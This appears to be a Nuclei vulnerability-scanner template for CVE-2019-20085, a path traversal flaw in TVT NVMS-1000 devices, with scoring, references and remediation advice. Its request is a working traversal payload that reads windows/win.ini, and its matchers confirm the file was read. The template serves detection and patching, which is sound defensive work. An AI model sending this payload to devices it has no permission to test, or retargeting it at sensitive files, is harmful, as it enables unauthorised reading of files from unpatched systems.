id: CVE-2019-20085 info: name: TVT NVMS 1000 - Local File Inclusion author: daffainfo severity: high description: | TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. remediation: | Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software. reference: - https://www.exploit-db.com/exploits/48311 - https://www.exploit-db.com/exploits/47774 - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.69009 epss-percentile: 0.97666 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tvt product: nvms-1000_firmware tags: cve,cve2019,iot,lfi,kev,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" matchers-condition: and matchers: - type: regex part: body regex: - "\\[(font|extension|file)s\\]" - type: status status: - 200 # digest: 4b0a0048304602210085b0b76471c7a2e95e38fdd86f4ca3b5985510939774a186642ca34b8d24addd022100ebf39caa1653dc177a0789c0da01dcadccd70d41f4de6164f67f4c746b481471:922c64590222798bb761d5b6d8e72950